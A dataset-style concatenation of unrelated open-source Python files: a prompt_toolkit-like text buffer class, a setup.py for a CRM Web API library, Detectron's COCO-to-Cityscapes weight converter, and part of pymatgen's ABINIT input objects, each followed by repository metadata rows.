found_something = False
for i in range(self.working_index - 1, -1, -1):
if self._history_matches(i):
self.working_index = i
count -= 1
found_something = True
if count == 0:
break
# If we move to another entry, move cursor to the end of the line.
if found_something:
self.cursor_position = len(self.text)
def start_selection(self, selection_type=SelectionType.CHARACTERS):
"""
Take the current cursor position as the start of this selection.
"""
self.selection_state = SelectionState(self.cursor_position, selection_type)
def copy_selection(self, _cut=False):
"""
Copy selected text and return :class:`ClipboardData` instance.
"""
if self.selection_state:
type = self.selection_state.type
# Take start and end of selection
from_, to = self.document.selection_range()
copied_text = self.text[from_:to]
# If cutting, remove the text and set the new cursor position.
if _cut:
self.document = Document(text=self.text[:from_] + self.text[to + 1:],
cursor_position=min(from_, to))
self.selection_state = None
return ClipboardData(copied_text, type)
else:
return ClipboardData('')
def cut_selection(self):
"""
Delete selected text and return :class:`ClipboardData` instance.
"""
return self.copy_selection(_cut=True)
def newline(self, copy_margin=True):
"""
Insert a line ending at the current position.
"""
if copy_margin:
self.insert_text('\n' + self.document.leading_whitespace_in_current_line)
else:
self.insert_text('\n')
def insert_line_above(self, copy_margin=True):
"""
Insert a new line above the current one.
"""
if copy_margin:
insert = self.document.leading_whitespace_in_current_line + '\n'
else:
insert = '\n'
self.cursor_position += self.document.get_start_of_line_position()
self.insert_text(insert)
self.cursor_position -= 1
def insert_line_below(self, copy_margin=True):
"""
Insert a new line below the current one.
"""
if copy_margin:
insert = '\n' + self.document.leading_whitespace_in_current_line
else:
insert = '\n'
self.cursor_position += self.document.get_end_of_line_position()
self.insert_text(insert)
def insert_text(self, data, overwrite=False, move_cursor=True, fire_event=True):
"""
Insert characters at cursor position.
:param fire_event: Fire `on_text_insert` event. This is mainly used to
trigger autocompletion while typing.
"""
# In insert/text mode.
if overwrite:
# Don't overwrite the newline itself. Just before the line ending, it should act like insert mode.
overwritten_text = self.text[self.cursor_position:self.cursor_position+len(data)]
if '\n' in overwritten_text:
overwritten_text = overwritten_text[:overwritten_text.find('\n')]
self.text = self.text[:self.cursor_position] + data + self.text[self.cursor_position+len(overwritten_text):]
else:
self.text = self.text[:self.cursor_position] + data + self.text[self.cursor_position:]
if move_cursor:
self.cursor_position += len(data)
# Fire 'on_text_insert' event.
if fire_event:
self.on_text_insert.fire()
def paste_clipboard_data(self, data, before=False, count=1):
"""
Insert the data from the clipboard.
"""
assert isinstance(data, ClipboardData)
if data.type == SelectionType.CHARACTERS:
if before:
self.insert_text(data.text * count)
else:
self.cursor_right()
self.insert_text(data.text * count, fire_event=False)
self.cursor_left()
elif data.type == SelectionType.LINES:
if before:
self.cursor_position += self.document.get_start_of_line_position(after_whitespace=False)
self.insert_text((data.text + '\n') * count, move_cursor=False)
else:
self.cursor_position += self.document.get_end_of_line_position()
self.insert_text(('\n' + data.text) * count, move_cursor=False, fire_event=False)
self.cursor_down()
self.cursor_position += self.document.get_start_of_line_position(after_whitespace=True)
def undo(self):
# Pop from the undo-stack until we find a text that if different from
# the current text. (The current logic of `save_to_undo_stack` will
# cause that the top of the undo stack is usually the same as the
# current text, so in that case we have to pop twice.)
while self._undo_stack:
text, pos = self._undo_stack.pop()
if text != self.text:
# Push current text to redo stack.
self._redo_stack.append((self.text, self.cursor_position))
# Set new text/cursor_position.
self.document = Document(text, cursor_position=pos)
break
def redo(self):
if self._redo_stack:
# Copy current state on undo stack.
self.save_to_undo_stack(clear_redo_stack=False)
# Pop state from redo stack.
text, pos = self._redo_stack.pop()
self.document = Document(text, cursor_position=pos)
def validate(self):
"""
Returns `True` if valid.
"""
self.validation_error = None
# Validate first. If not valid, set validation exception.
if self.validator:
try:
self.validator.validate(self.document)
except ValidationError as e:
# Set cursor position (don't allow invalid values.)
cursor_position = e.index
self.cursor_position = min(max(0, cursor_position), len(self.text))
self.validation_error = e
return False
return True
def append_to_history(self):
"""
Append the current input to the history.
(Only if valid input.)
"""
# Validate first. If not valid, set validation exception.
if not self.validate():
return
# Save at the tail of the history. (But don't if the last entry the
# history is already the same.)
if self.text and (not len(self.history) or self.history[-1] != self.text):
self.history.append(self.text)
def _search(self, search_state, include_current_position=False, count=1):
"""
Execute search. Return (working_index, cursor_position) tuple when this
search is applied. Returns `None` when this text cannot be found.
"""
assert isinstance(search_state, SearchState)
assert isinstance(count, int) and count > 0
text = search_state.text
direction = search_state.direction
ignore_case = search_state.ignore_case()
def search_once(working_index, document):
"""
Do search one time.
Return (working_index, document) or `None`
"""
if direction == IncrementalSearchDirection.FORWARD:
# Try find at the current input.
new_index = document.find(
text, include_current_position=include_current_position,
ignore_case=ignore_case)
if new_index is not None:
return (working_index,
Document(document.text, document.cursor_position + new_index))
else:
# No match, go forward in the history. (Include len+1 to wrap around.)
# (Here we should always include all cursor positions, because
# it's a different line.)
for i in range(working_index + 1, len(self._working_lines) + 1):
i %= len(self._working_lines)
document = Document(self._working_lines[i], 0)
new_index = document.find(text, include_current_position=True,
ignore_case=ignore_case)
if new_index is not None:
return (i, Document(document.text, new_index))
else:
# Try find at the current input.
new_index = document.find_backwards(
text, ignore_case=ignore_case)
if new_index is not None:
return (working_index,
Document(document.text, document.cursor_position + new_index))
else:
# No match, go back in the history. (Include -1 to wrap around.)
for i in range(working_index - 1, -2, -1):
i %= len(self._working_lines)
document = Document(self._working_lines[i], len(self._working_lines[i]))
new_index = document.find_backwards(
text, ignore_case=ignore_case)
if new_index is not None:
return (i, Document(document.text, len(document.text) + new_index))
# Do 'count' search iterations.
working_index = self.working_index
document = self.document
for i in range(count):
result = search_once(working_index, document)
if result is None:
return # Nothing found.
else:
working_index, document = result
return (working_index, document.cursor_position)
def document_for_search(self, search_state):
"""
Return a `Document` instance that has the text/cursor position for this
search, if we would apply it.
"""
search_result = self._search(search_state, include_current_position=True)
if search_result is None:
return self.document
else:
working_index, cursor_position = search_result
return Document(self._working_lines[working_index], cursor_position)
def apply_search(self, search_state, include_current_position=True, count=1):
"""
Return a `Document` instance that has the text/cursor position for this
search, if we would apply it.
"""
search_result = self._search(search_state,
include_current_position=include_current_position, count=count)
if search_result is not None:
working_index, cursor_position = search_result
self.working_index = working_index
self.cursor_position = cursor_position
def exit_selection(self):
self.selection_state = None
def open_in_editor(self, cli):
"""
Open code in editor.
:param cli: `CommandLineInterface` instance.
"""
if self.read_only():
raise EditReadOnlyBuffer()
# Write to temporary file
descriptor, filename = tempfile.mkstemp(self.tempfile_suffix)
os.write(descriptor, self.text.encode('utf-8'))
os.close(descriptor)
# Open in editor
# (We need to use `cli.run_in_terminal`, because not all editors go to
# the alternate screen buffer, and some could influence the cursor
# position.)
succes = cli.run_in_terminal(lambda: self._open_file_in_editor(filename))
# Read content again.
if succes:
with open(filename, 'rb') as f:
text = f.read().decode('utf-8')
# Drop trailing newline. (Editors are supposed to add it at the
# end, but we don't need it.)
if text.endswith('\n'):
text = text[:-1]
self.document = Document(
text=text,
cursor_position=len(text))
# Clean up temp file.
os.remove(filename)
def _open_file_in_editor(self, filename):
"""
Call editor executable.
Return True when we received a zero return code.
"""
# If the 'EDITOR' environment variable has been set, use that one.
# Otherwise, fall back to the first available editor that we can find.
editor = os.environ.get('EDITOR')
editors = [
editor,
# Order of preference.
'/usr/bin/editor',
'/usr/bin/nano',
'/usr/bin/pico',
'/usr/bin/vi',
'/usr/bin/emacs',
]
for e in editors:
if e:
try:
returncode = subprocess.call([e, filename])
return returncode == 0
except OSError:
# Executable does not exist, try the next one.
pass
return False
def indent(buffer, from_row, to_row, count=1):
"""
Indent text of the `Buffer` object.
"""
current_row = buffer.document.cursor_position_row
line_range = range(from_row, to_row)
# Apply transformation.
new_text = buffer.transform_lines(line_range, lambda l: ' ' * count + l)
buffer.document = Document(
new_text,
Document(new_text).translate_row_col_to_index(current_row, 0))
# Go to the start of the line.
buffer.cursor_position += buffer.document.get_start_of_line_position(after_whitespace=True)
def unindent(buffer, from_row, to_row, count=1):
"""
Unindent text of the `Buffer` object.
"""
current_row = buffer.document.cursor_position_row
line_range = range(from_row, to_row)
def transform(text):
remove = ' ' * count
if text.startswith(remove):
return text[len(remove):]
else:
return text.lstrip()
# Apply transformation.
new_text = buffer.transform_lines(line_range, transform)
buffer.document = Document(
new_text,
Document(new_text).translate_row_col_to_index(current_row, 0))
# Go to the start of the line.
buffer.cursor_position += buffer.document.get_start_of_line_position(after_whitespace=True)
|
bsd-3-clause
| -6,038,432,106,492,722,000
| 35.223602
| 120
| 0.588698
| false
| 4.353631
| false
| false
| false
|
davidyack/Xrm.Tools.CRMWebAPI
|
python/setup.py
|
1
|
1265
|
#!/usr/bin/env python
'''The setup and build script for the python-crmwebapi library.'''
import os
from setuptools import setup, find_packages
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
setup(
name='xrm-tools-crmwebapi',
version='1.0',
author='Xrm.Tools',
author_email='',
license='MIT',
url='https://github.com/davidyack/Xrm.Tools.CRMWebAPI',
keywords='crmwebapi',
description='A Python version of CRMWebAPI',
long_description=(read('README.rst')),
packages=find_packages(exclude=['tests*']),
install_requires=['future', 'requests'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
],
)
|
mit
| -3,837,700,705,353,445,400
| 30.625
| 71
| 0.621344
| false
| 4.041534
| false
| false
| false
|
facebookresearch/Detectron
|
tools/convert_coco_model_to_cityscapes.py
|
1
|
4289
|
#!/usr/bin/env python
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
# Convert a detection model trained for COCO into a model that can be fine-tuned
# on cityscapes
#
# cityscapes_to_coco
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import numpy as np
import os
import sys
import detectron.datasets.coco_to_cityscapes_id as cs
from detectron.utils.io import load_object
from detectron.utils.io import save_object
NUM_CS_CLS = 9
NUM_COCO_CLS = 81
def parse_args():
parser = argparse.ArgumentParser(
description='Convert a COCO pre-trained model for use with Cityscapes')
parser.add_argument(
'--coco_model', dest='coco_model_file_name',
help='Pretrained network weights file path',
default=None, type=str)
parser.add_argument(
'--convert_func', dest='convert_func',
help='Blob conversion function',
default='cityscapes_to_coco', type=str)
parser.add_argument(
'--output', dest='out_file_name',
help='Output file path',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def convert_coco_blobs_to_cityscape_blobs(model_dict):
for k, v in model_dict['blobs'].items():
if v.shape[0] == NUM_COCO_CLS or v.shape[0] == 4 * NUM_COCO_CLS:
coco_blob = model_dict['blobs'][k]
print(
'Converting COCO blob {} with shape {}'.
format(k, coco_blob.shape)
)
cs_blob = convert_coco_blob_to_cityscapes_blob(
coco_blob, args.convert_func
)
print(' -> converted shape {}'.format(cs_blob.shape))
model_dict['blobs'][k] = cs_blob
def convert_coco_blob_to_cityscapes_blob(coco_blob, convert_func):
# coco blob (81, ...) or (81*4, ...)
coco_shape = coco_blob.shape
leading_factor = int(coco_shape[0] / NUM_COCO_CLS)
tail_shape = list(coco_shape[1:])
assert leading_factor == 1 or leading_factor == 4
# Reshape in [num_classes, ...] form for easier manipulations
coco_blob = coco_blob.reshape([NUM_COCO_CLS, -1] + tail_shape)
# Default initialization uses Gaussian with mean and std to match the
# existing parameters
std = coco_blob.std()
mean = coco_blob.mean()
cs_shape = [NUM_CS_CLS] + list(coco_blob.shape[1:])
cs_blob = (np.random.randn(*cs_shape) * std + mean).astype(np.float32)
# Replace random parameters with COCO parameters if class mapping exists
for i in range(NUM_CS_CLS):
coco_cls_id = getattr(cs, convert_func)(i)
if coco_cls_id >= 0: # otherwise ignore (rand init)
cs_blob[i] = coco_blob[coco_cls_id]
cs_shape = [NUM_CS_CLS * leading_factor] + tail_shape
return cs_blob.reshape(cs_shape)
def remove_momentum(model_dict):
for k in model_dict['blobs'].keys():
if k.endswith('_momentum'):
del model_dict['blobs'][k]
def load_and_convert_coco_model(args):
model_dict = load_object(args.coco_model_file_name)
remove_momentum(model_dict)
convert_coco_blobs_to_cityscape_blobs(model_dict)
return model_dict
if __name__ == '__main__':
args = parse_args()
print(args)
assert os.path.exists(args.coco_model_file_name), \
'Weights file does not exist'
weights = load_and_convert_coco_model(args)
save_object(weights, args.out_file_name)
print('Wrote blobs to {}:'.format(args.out_file_name))
print(sorted(weights['blobs'].keys()))
|
apache-2.0
| -572,377,124,243,045,500
| 32.507813
| 80
| 0.639543
| false
| 3.433947
| false
| false
| false
|
rousseab/pymatgen
|
pymatgen/io/abinitio/abiobjects.py
|
1
|
42855
|
# coding: utf-8
"""
Low-level objects providing an abstraction for the objects involved in the calculation.
"""
from __future__ import unicode_literals, division, print_function
import collections
import abc
import six
import numpy as np
import pymatgen.core.units as units
from pprint import pformat
from monty.design_patterns import singleton
from monty.collections import AttrDict
from pymatgen.core.design_patterns import Enum
from pymatgen.serializers.json_coders import PMGSONable, pmg_serialize
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from monty.json import MontyEncoder, MontyDecoder
def contract(s):
"""
>>> assert contract("1 1 1 2 2 3") == "3*1 2*2 1*3"
>>> assert contract("1 1 3 2 3") == "2*1 1*3 1*2 1*3"
"""
if not s: return s
tokens = s.split()
old = tokens[0]
count = [[1, old]]
for t in tokens[1:]:
if t == old:
count[-1][0] += 1
else:
old = t
count.append([1, t])
return " ".join("%d*%s" % (c, t) for c, t in count)
class AbivarAble(six.with_metaclass(abc.ABCMeta, object)):
"""
An `AbivarAble` object provides a method `to_abivars`
that returns a dictionary with the abinit variables.
"""
@abc.abstractmethod
def to_abivars(self):
"""Returns a dictionary with the abinit variables."""
#@abc.abstractmethod
#def from_abivars(cls, vars):
# """Build the object from a dictionary with Abinit variables."""
def __str__(self):
return pformat(self.to_abivars(), indent=1, width=80, depth=None)
def __contains__(self, key):
return key in self.to_abivars()
@singleton
class MandatoryVariable(object):
"""
Singleton used to tag mandatory variables, just because I can use
the cool syntax: variable is MANDATORY!
"""
@singleton
class DefaultVariable(object):
"""Singleton used to tag variables that will have the default value"""
MANDATORY = MandatoryVariable()
DEFAULT = DefaultVariable()
class SpinMode(collections.namedtuple('SpinMode', "mode nsppol nspinor nspden"), AbivarAble, PMGSONable):
"""
Different configurations of the electron density as implemented in abinit:
One can use as_spinmode to construct the object via SpinMode.as_spinmode
(string) where string can assume the values:
- polarized
- unpolarized
- afm (anti-ferromagnetic)
- spinor (non-collinear magnetism)
- spinor_nomag (non-collinear, no magnetism)
"""
@classmethod
def as_spinmode(cls, obj):
"""Converts obj into a `SpinMode` instance"""
if isinstance(obj, cls):
return obj
else:
# Assume a string with mode
try:
return _mode2spinvars[obj]
except KeyError:
raise KeyError("Wrong value for spin_mode: %s" % str(obj))
def to_abivars(self):
return {
"nsppol": self.nsppol,
"nspinor": self.nspinor,
"nspden": self.nspden,
}
@pmg_serialize
def as_dict(self):
return {k: getattr(self, k) for k in self._fields}
@classmethod
def from_dict(cls, d):
return cls(**{k: d[k] for k in d if k in cls._fields})
# An handy Multiton
_mode2spinvars = {
"unpolarized": SpinMode("unpolarized", 1, 1, 1),
"polarized": SpinMode("polarized", 2, 1, 2),
"afm": SpinMode("afm", 1, 1, 2),
"spinor": SpinMode("spinor", 1, 2, 4),
"spinor_nomag": SpinMode("spinor_nomag", 1, 2, 1),
}
class Smearing(AbivarAble, PMGSONable):
"""
Variables defining the smearing technique. The preferred way to instanciate
a `Smearing` object is via the class method Smearing.as_smearing(string)
"""
#: Mapping string_mode --> occopt
_mode2occopt = {
'nosmearing': 1,
'fermi_dirac': 3,
'marzari4': 4,
'marzari5': 5,
'methfessel': 6,
'gaussian': 7}
def __init__(self, occopt, tsmear):
self.occopt = occopt
self.tsmear = tsmear
def __str__(self):
s = "occopt %d # %s Smearing\n" % (self.occopt, self.mode)
if self.tsmear:
s += 'tsmear %s' % self.tsmear
return s
def __eq__(self, other):
return (self.occopt == other.occopt and
np.allclose(self.tsmear, other.tsmear))
def __ne__(self, other):
return not self == other
def __bool__(self):
return self.mode != "nosmearing"
# py2 old version
__nonzero__ = __bool__
@classmethod
def as_smearing(cls, obj):
"""
Constructs an instance of `Smearing` from obj. Accepts obj in the form:
* Smearing instance
* "name:tsmear" e.g. "gaussian:0.004" (Hartree units)
* "name:tsmear units" e.g. "gaussian:0.1 eV"
* None --> no smearing
"""
if obj is None:
return Smearing.nosmearing()
if isinstance(obj, cls):
return obj
# obj is a string
if obj == "nosmearing":
return cls.nosmearing()
else:
obj, tsmear = obj.split(":")
obj.strip()
occopt = cls._mode2occopt[obj]
try:
tsmear = float(tsmear)
except ValueError:
tsmear, unit = tsmear.split()
tsmear = units.Energy(float(tsmear), unit).to("Ha")
return cls(occopt, tsmear)
@property
def mode(self):
for (mode_str, occopt) in self._mode2occopt.items():
if occopt == self.occopt:
return mode_str
raise AttributeError("Unknown occopt %s" % self.occopt)
@staticmethod
def nosmearing():
return Smearing(1, 0.0)
def to_abivars(self):
if self.mode == "nosmearing":
return {"occopt": 1, "tsmear": 0.0}
else:
return {"occopt": self.occopt, "tsmear": self.tsmear,}
@pmg_serialize
def as_dict(self):
"""json friendly dict representation of Smearing"""
return {"occopt": self.occopt, "tsmear": self.tsmear}
@staticmethod
def from_dict(d):
return Smearing(d["occopt"], d["tsmear"])
class ElectronsAlgorithm(dict, AbivarAble, PMGSONable):
"""Variables controlling the SCF/NSCF algorithm."""
# None indicates that we use abinit defaults.
_DEFAULT = dict(
iprcell=None, iscf=None, diemac=None, diemix=None, diemixmag=None,
dielam=None, diegap=None, dielng=None, diecut=None, nstep=50)
def __init__(self, *args, **kwargs):
super(ElectronsAlgorithm, self).__init__(*args, **kwargs)
for k in self:
if k not in self._DEFAULT:
raise ValueError("%s: No default value has been provided for "
"key %s" % (self.__class__.__name__, k))
def to_abivars(self):
return self.copy()
@pmg_serialize
def as_dict(self):
return self.copy()
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop("@module", None)
d.pop("@class", None)
return cls(**d)
class Electrons(AbivarAble, PMGSONable):
"""The electronic degrees of freedom"""
def __init__(self, spin_mode="polarized", smearing="fermi_dirac:0.1 eV",
algorithm=None, nband=None, fband=None, charge=0.0, comment=None): # occupancies=None,
"""
Constructor for Electrons object.
Args:
comment: String comment for Electrons
charge: Total charge of the system. Default is 0.
"""
super(Electrons, self).__init__()
self.comment = comment
self.smearing = Smearing.as_smearing(smearing)
self.spin_mode = SpinMode.as_spinmode(spin_mode)
self.nband = nband
self.fband = fband
self.charge = charge
self.algorithm = algorithm
@property
def nsppol(self):
return self.spin_mode.nsppol
@property
def nspinor(self):
return self.spin_mode.nspinor
@property
def nspden(self):
return self.spin_mode.nspden
def as_dict(self):
"json friendly dict representation"
d = {}
d["@module"] = self.__class__.__module__
d["@class"] = self.__class__.__name__
d["spin_mode"] = self.spin_mode.as_dict()
d["smearing"] = self.smearing.as_dict()
d["algorithm"] = self.algorithm.as_dict() if self.algorithm else None
d["nband"] = self.nband
d["fband"] = self.fband
d["charge"] = self.charge
d["comment"] = self.comment
return d
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop("@module", None)
d.pop("@class", None)
dec = MontyDecoder()
d["spin_mode"] = dec.process_decoded(d["spin_mode"])
d["smearing"] = dec.process_decoded(d["smearing"])
d["algorithm"] = dec.process_decoded(d["algorithm"]) if d["algorithm"] else None
return cls(**d)
def to_abivars(self):
abivars = self.spin_mode.to_abivars()
abivars.update({
"nband" : self.nband,
"fband" : self.fband,
"charge" : self.charge,
})
if self.smearing:
abivars.update(self.smearing.to_abivars())
if self.algorithm:
abivars.update(self.algorithm)
#abivars["#comment"] = self.comment
return abivars
class KSampling(AbivarAble, PMGSONable):
"""
Input variables defining the K-point sampling.
"""
# Modes supported by the constructor.
modes = Enum(('monkhorst', 'path', 'automatic',))
def __init__(self, mode="monkhorst", num_kpts= 0, kpts=((1, 1, 1),), kpt_shifts=(0.5, 0.5, 0.5),
kpts_weights=None, use_symmetries=True, use_time_reversal=True, chksymbreak=None,
comment=None):
"""
Highly flexible constructor for KSampling objects. The flexibility comes
at the cost of usability and in general, it is recommended that you use
the default constructor only if you know exactly what you are doing and
requires the flexibility. For most usage cases, the object be constructed
far more easily using the convenience static constructors:
#. gamma_only
#. gamma_centered
#. monkhorst
#. monkhorst_automatic
#. path
and it is recommended that you use those.
Args:
mode: Mode for generating k-poits. Use one of the KSampling.modes enum types.
num_kpts: Number of kpoints if mode is "automatic"
Number of division for the sampling of the smallest segment if mode is "path".
Not used for the other modes
kpts: Number of divisions. Even when only a single specification is
required, e.g. in the automatic scheme, the kpts should still
be specified as a 2D array. e.g., [[20]] or [[2,2,2]].
kpt_shifts: Shifts for Kpoints.
use_symmetries: False if spatial symmetries should not be used
to reduce the number of independent k-points.
use_time_reversal: False if time-reversal symmetry should not be used
to reduce the number of independent k-points.
kpts_weights: Optional weights for kpoints. For explicit kpoints.
chksymbreak: Abinit input variable: check whether the BZ sampling preserves the symmetry of the crystal.
comment: String comment for Kpoints
.. note::
The default behavior of the constructor is monkhorst.
"""
if mode not in KSampling.modes:
raise ValueError("Unknown kpoint mode %s" % mode)
super(KSampling, self).__init__()
self.mode = mode
self.comment = comment
self.num_kpts = num_kpts
self.kpts = kpts
self.kpt_shifts = kpt_shifts
self.kpts_weights = kpts_weights
self.use_symmetries = use_symmetries
self.use_time_reversal = use_time_reversal
self.chksymbreak = chksymbreak
abivars = {}
if mode in ("monkhorst",):
assert num_kpts == 0
ngkpt = np.reshape(kpts, 3)
shiftk = np.reshape(kpt_shifts, (-1,3))
if use_symmetries and use_time_reversal: kptopt = 1
if not use_symmetries and use_time_reversal: kptopt = 2
if not use_symmetries and not use_time_reversal: kptopt = 3
if use_symmetries and not use_time_reversal: kptopt = 4
abivars.update({
"ngkpt" : ngkpt,
"shiftk" : shiftk,
"nshiftk" : len(shiftk),
"kptopt" : kptopt,
"chksymbreak": chksymbreak,
})
elif mode in ("path",):
if num_kpts <= 0:
raise ValueError("For Path mode, num_kpts must be specified and >0")
kptbounds = np.reshape(kpts, (-1,3))
#print("in path with kptbound: %s " % kptbounds)
abivars.update({
"ndivsm" : num_kpts,
"kptbounds": kptbounds,
"kptopt" : -len(kptbounds)+1,
})
elif mode in ("automatic",):
kpts = np.reshape(kpts, (-1,3))
if len(kpts) != num_kpts:
raise ValueError("For Automatic mode, num_kpts must be specified.")
kptnrm = np.ones(num_kpts)
abivars.update({
"kptopt" : 0,
"kpt" : kpts,
"nkpt" : num_kpts,
"kptnrm" : kptnrm,
"wtk" : kpts_weights, # for iscf/=-2, wtk.
"chksymbreak": chksymbreak,
})
else:
raise ValueError("Unknown mode %s" % mode)
self.abivars = abivars
#self.abivars["#comment"] = comment
@property
def is_homogeneous(self):
return self.mode not in ["path"]
@classmethod
def gamma_only(cls):
"""Gamma-only sampling"""
return cls(kpt_shifts=(0.0,0.0,0.0), comment="Gamma-only sampling")
@classmethod
def gamma_centered(cls, kpts=(1, 1, 1), use_symmetries=True, use_time_reversal=True):
"""
Convenient static constructor for an automatic Gamma centered Kpoint grid.
Args:
kpts: Subdivisions N_1, N_2 and N_3 along reciprocal lattice vectors.
use_symmetries: False if spatial symmetries should not be used
to reduce the number of independent k-points.
use_time_reversal: False if time-reversal symmetry should not be used
to reduce the number of independent k-points.
Returns:
:class:`KSampling` object.
"""
return cls(kpts=[kpts], kpt_shifts=(0.0, 0.0, 0.0),
use_symmetries=use_symmetries, use_time_reversal=use_time_reversal,
comment="gamma-centered mode")
@classmethod
def monkhorst(cls, ngkpt, shiftk=(0.5, 0.5, 0.5), chksymbreak=None, use_symmetries=True,
use_time_reversal=True, comment=None):
"""
Convenient static constructor for a Monkhorst-Pack mesh.
Args:
ngkpt: Subdivisions N_1, N_2 and N_3 along reciprocal lattice vectors.
shiftk: Shift to be applied to the kpoints.
use_symmetries: Use spatial symmetries to reduce the number of k-points.
use_time_reversal: Use time-reversal symmetry to reduce the number of k-points.
Returns:
:class:`KSampling` object.
"""
return cls(
kpts=[ngkpt], kpt_shifts=shiftk,
use_symmetries=use_symmetries, use_time_reversal=use_time_reversal, chksymbreak=chksymbreak,
comment=comment if comment else "Monkhorst-Pack scheme with user-specified shiftk")
@classmethod
def monkhorst_automatic(cls, structure, ngkpt,
use_symmetries=True, use_time_reversal=True, chksymbreak=None, comment=None):
"""
Convenient static constructor for an automatic Monkhorst-Pack mesh.
Args:
structure: :class:`Structure` object.
ngkpt: Subdivisions N_1, N_2 and N_3 along reciprocal lattice vectors.
use_symmetries: Use spatial symmetries to reduce the number of k-points.
use_time_reversal: Use time-reversal symmetry to reduce the number of k-points.
Returns:
:class:`KSampling` object.
"""
sg = SpacegroupAnalyzer(structure)
#sg.get_crystal_system()
#sg.get_point_group()
# TODO
nshiftk = 1
#shiftk = 3*(0.5,) # this is the default
shiftk = 3*(0.5,)
#if lattice.ishexagonal:
#elif lattice.isbcc
#elif lattice.isfcc
return cls.monkhorst(
ngkpt, shiftk=shiftk, use_symmetries=use_symmetries, use_time_reversal=use_time_reversal,
chksymbreak=chksymbreak, comment=comment if comment else "Automatic Monkhorst-Pack scheme")
@classmethod
def _path(cls, ndivsm, structure=None, kpath_bounds=None, comment=None):
"""
Static constructor for path in k-space.
Args:
structure: :class:`Structure` object.
kpath_bounds: List with the reduced coordinates of the k-points defining the path.
ndivsm: Number of division for the smallest segment.
comment: Comment string.
Returns:
:class:`KSampling` object.
"""
if kpath_bounds is None:
# Compute the boundaries from the input structure.
from pymatgen.symmetry.bandstructure import HighSymmKpath
sp = HighSymmKpath(structure)
# Flat the array since "path" is a a list of lists!
kpath_labels = []
for labels in sp.kpath["path"]:
kpath_labels.extend(labels)
kpath_bounds = []
for label in kpath_labels:
red_coord = sp.kpath["kpoints"][label]
#print("label %s, red_coord %s" % (label, red_coord))
kpath_bounds.append(red_coord)
return cls(mode=KSampling.modes.path, num_kpts=ndivsm, kpts=kpath_bounds,
comment=comment if comment else "K-Path scheme")
@classmethod
def path_from_structure(cls, ndivsm, structure):
"""See _path for the meaning of the variables"""
return cls._path(ndivsm, structure=structure, comment="K-path generated automatically from structure")
@classmethod
def explicit_path(cls, ndivsm, kpath_bounds):
"""See _path for the meaning of the variables"""
return cls._path(ndivsm, kpath_bounds=kpath_bounds, comment="Explicit K-path")
@classmethod
def automatic_density(cls, structure, kppa, chksymbreak=None, use_symmetries=True, use_time_reversal=True,
shifts=(0.5, 0.5, 0.5)):
"""
Returns an automatic Kpoint object based on a structure and a kpoint
density. Uses Gamma centered meshes for hexagonal cells and Monkhorst-Pack grids otherwise.
Algorithm:
Uses a simple approach scaling the number of divisions along each
reciprocal lattice vector proportional to its length.
Args:
structure: Input structure
kppa: Grid density
"""
lattice = structure.lattice
lengths = lattice.abc
ngrid = kppa / structure.num_sites
mult = (ngrid * lengths[0] * lengths[1] * lengths[2]) ** (1 / 3.)
num_div = [int(round(1.0 / lengths[i] * mult)) for i in range(3)]
# ensure that num_div[i] > 0
num_div = [i if i > 0 else 1 for i in num_div]
angles = lattice.angles
hex_angle_tol = 5 # in degrees
hex_length_tol = 0.01 # in angstroms
right_angles = [i for i in range(3) if abs(angles[i] - 90) < hex_angle_tol]
hex_angles = [i for i in range(3)
if abs(angles[i] - 60) < hex_angle_tol or
abs(angles[i] - 120) < hex_angle_tol]
is_hexagonal = (len(right_angles) == 2 and len(hex_angles) == 1
and abs(lengths[right_angles[0]] -
lengths[right_angles[1]]) < hex_length_tol)
#style = Kpoints.modes.gamma
#if not is_hexagonal:
# num_div = [i + i % 2 for i in num_div]
# style = Kpoints.modes.monkhorst
comment = "abinitio generated KPOINTS with grid density = " + "{} / atom".format(kppa)
shifts = np.reshape(shifts, (-1, 3))
return cls(
mode="monkhorst", num_kpts=0, kpts=[num_div], kpt_shifts=shifts,
use_symmetries=use_symmetries, use_time_reversal=use_time_reversal, chksymbreak=chksymbreak,
comment=comment)
def to_abivars(self):
return self.abivars
def as_dict(self):
enc = MontyEncoder()
return {'mode': self.mode, 'comment': self.comment, 'num_kpts': self.num_kpts,
'kpts': enc.default(np.array(self.kpts)), 'kpt_shifts': self.kpt_shifts,
'kpts_weights': self.kpts_weights, 'use_symmetries': self.use_symmetries,
'use_time_reversal': self.use_time_reversal, 'chksymbreak': self.chksymbreak,
'@module': self.__class__.__module__, '@class': self.__class__.__name__}
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop('@module', None)
d.pop('@class', None)
dec = MontyDecoder()
d['kpts'] = dec.process_decoded(d['kpts'])
return cls(**d)
class Constraints(AbivarAble):
"""This object defines the constraints for structural relaxation"""
def to_abivars(self):
raise NotImplementedError("")
class RelaxationMethod(AbivarAble, PMGSONable):
"""
This object stores the variables for the (constrained) structural optimization
ionmov and optcell specify the type of relaxation.
The other variables are optional and their use depend on ionmov and optcell.
A None value indicates that we use abinit default. Default values can
be modified by passing them to the constructor.
The set of variables are constructed in to_abivars depending on ionmov and optcell.
"""
_default_vars = {
"ionmov" : MANDATORY,
"optcell" : MANDATORY,
"ntime" : 80,
"dilatmx" : 1.05,
"ecutsm" : 0.5,
"strfact" : None,
"tolmxf" : None,
"strtarget" : None,
